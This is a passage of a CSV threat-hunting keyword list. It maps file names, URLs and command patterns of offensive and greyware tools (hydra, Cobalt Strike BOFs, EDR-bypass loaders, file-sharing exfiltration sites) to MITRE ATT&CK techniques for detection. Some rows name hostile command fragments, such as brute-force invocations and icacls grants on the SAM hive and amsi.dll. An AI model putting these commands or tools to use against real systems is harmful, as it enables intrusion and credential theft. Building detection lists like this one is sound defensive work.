T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","198","35","2023-08-25T13:41:49Z","2023-06-30T10:59:55Z" +"*https://temp.sh/*/*","greyware_tool_keyword","temp.sh","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Collection","https://twitter.com/mthcht/status/1660953897622544384","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://temp.sh/upload*","greyware_tool_keyword","temp.sh","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://tempsend.com/*","greyware_tool_keyword","tempsend.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Collection","https://twitter.com/mthcht/status/1660953897622544384","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://tempsend.com/send*","greyware_tool_keyword","tempsend.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://textbin.net/raw/*","greyware_tool_keyword","textbin.net","textbin.net raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","textbin.net","1","1","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" +"*https://tmpfiles.org/dl/*.exe*","greyware_tool_keyword","tmpfiles.org","download of an executable files from tmpfiles.org often used by ransomware groups","T1566.002 - T1192 - T1105","TA0001 - TA0002","N/A","N/A","Collection","N/A","1","1","greyware tool - risk of false positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://transfer.sh*","greyware_tool_keyword","transfer.sh","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://transfert-my-files.com/files/*","greyware_tool_keyword","transfert-my-files.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Collection","https://twitter.com/mthcht/status/1660953897622544384","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://transfert-my-files.com/inc/upload.php*","greyware_tool_keyword","transfert-my-files.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://we.tl/t-*","greyware_tool_keyword","wetransfer","WeTransfer is a popular file sharing service often used by malicious actors for phishing campaigns due to its legitimate reputation and widespread use even within some enterprises to share files","T1608.001 - T1566 - T1002 - T1048 - T1204","TA0001 - TA0002 - TA0010","N/A","EXOTIC LILY","Phishing","https://twitter.com/mthcht/status/1658853848323182597","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://web.archive.org/*https://www.kernel-exploits.com/media/*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*https://wetransfer.com/api/v4/transfers/*","greyware_tool_keyword","wetransfer","WeTransfer is a popular file-sharing service often used by malicious actors for phishing campaigns due to its legitimate reputation and widespread use even within some enterprises to share files","T1608.001 - T1566 - T1002 - T1048 - T1204","TA0001 - TA0002 - TA0010","N/A","EXOTIC LILY","Phishing","https://twitter.com/mthcht/status/1658853848323182597","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://wetransfer.com/downloads/*","greyware_tool_keyword","wetransfer","WeTransfer is a popular file-sharing service often used by malicious actors for phishing campaigns due to its legitimate reputation and widespread use even within some enterprises to share files","T1608.001 - T1566 - T1002 - T1048 - T1204","TA0001 - TA0002 - TA0010","N/A","EXOTIC LILY","Phishing","https://twitter.com/mthcht/status/1658853848323182597","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://wfuzz.readthedocs.io*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*https://www.email-format.com/d/*","greyware_tool_keyword","email-format","used by attackers to find informations about a company users","T1593 - T1596 - T1213","TA0009","N/A","N/A","Reconnaissance","https://www.email-format.com","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://www.myget.org/F/fireeye/api/v2*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*https://www.nirsoft.net/toolsdownload/*","greyware_tool_keyword","nirsoft tools","NirSoft is a legitimate software company that develops system utilities for Windows. Some of its tools can be used by malicious actors to recover passwords harvest sensitive information and conduct password attacks.","T1003 - T1003.001 - T1003.002 - T1110 - T1566","TA0002 - TA0003 - TA0004 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","Collection","N/A","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://www.nirsoft.net/toolsdownload/*.exe*","greyware_tool_keyword","nirsoft tools","some of nirsoft tools can be abused by attackers to retrieve passwords ","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","nirsoft.net","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://www.nirsoft.net/toolsdownload/*.zip*","greyware_tool_keyword","nirsoft tools","some of nirsoft tools can be abused by attackers to retrieve passwords ","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","nirsoft.net","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://www.nirsoft.net/utils/*.exe*","greyware_tool_keyword","nirsoft tools","some of nirsoft tools can be abused by attackers to retrieve passwords ","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","nirsoft.net","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://www.nirsoft.net/utils/*.zip*","greyware_tool_keyword","nirsoft tools","some of nirsoft tools can be abused by attackers to retrieve passwords ","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","nirsoft.net","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*https://www.skymem.info/srch?q=*","greyware_tool_keyword","skymen.info","used by attackers to find informations about a company users","T1593 - T1596 - T1213","TA0009","N/A","N/A","Reconnaissance","https://www.skymem.info","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*https_revshell.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*httpsmuggler.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" +"*https-portal*","offensive_tool_keyword","https-portal","HTTPS-PORTAL is a fully automated HTTPS server powered by Nginx. Lets Encrypt and Docker. By using it. you can run any existing web application over HTTPS. with only one extra line of configuration. The SSL certificates are obtained. and renewed from Lets Encrypt automatically.","T1042 - T1571 - T1021 - T1135","TA0002 - TA0003 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/SteveLTN/https-portal","1","0","N/A","N/A","10","4210","288","2023-01-29T14:55:41Z","2015-12-14T20:09:04Z" +"*'http-stager'*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*huan.exe *.exe","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","0","N/A","N/A","6","518","103","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" +"*Huan.sln*","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","1","N/A","N/A","6","518","103","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" +"*Huan.vcxproj*","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","1","N/A","N/A","6","518","103","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" +"*HuanLoader.vcxproj*","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","1","N/A","N/A","6","518","103","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" +"*hub.docker.com/u/kalilinux/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*HunnicCyber/SharpDomainSpray*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" +"*HVNC Server.exe*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*HVNC\ Server*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*hydra -*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*hydra * ftp://*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*hydra * http-post-form *","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*hydra * mysql://*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*hydra * ssh://*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*hydra * telnet://*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*hydra smtp-enum*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*hydra.c*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*hydra:x:10001:*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*HYDRA_PROXY_HTTP*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*hydra-cobaltstrike*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*Hyperion PE-Crypter*","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*hyperion.exe *","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*hyperion_2.0.orig.tar.gz*","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*Hypnos-main.zip*","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","1","N/A","10","1","49","5","2023-08-22T20:17:31Z","2023-07-11T09:07:10Z" +"*hypobrychium.exe*","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z" +"*hypobrychium-main*","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z" +"*i2pinstall*","offensive_tool_keyword","I2P","I2P - The Invisible Internet Project.","T1048.001 - T1568.003","TA0011 - TA0040","N/A","N/A","Data Exfiltration","https://geti2p.net/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*iam__enum_assume_role/default-word-list.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*iAmAnIndependentStrongPassswordThatNeedsToBeSecure*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*iammaguire/Gotato*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" +"*ibmiscanner2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*IBurpExtender.java*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" +"*IBurpExtenderCallbacks.java*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0010 - TA0007 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" +"*icacls ""C:\windows\system32\config\SAM"" /grant*","greyware_tool_keyword","icalcs","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" +"*icacls.exe C:\Windows\System32\amsi.dll /grant administrators:F*","greyware_tool_keyword","icalcs","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin","1","0","N/A","10","8","N/A","N/A","N/A","N/A" +"*icebreaker:P@ssword123456*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*icebreaker-master.zip*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*icebreaker-scan.xml*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*IcebreakerSecurity/DelegationBOF*","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","10","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" +"*IcebreakerSecurity/DelegationBOF*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" +"*IcebreakerSecurity/PersistBOF*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*ice-wzl/wmiexec2*","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" +"*ICMP-ReceiveFile.py*","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","285","57","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" +"*Icmp-Redirect.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*ICMP-SendFile.py*","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","285","57","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" +"*icmpsh.exe*","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 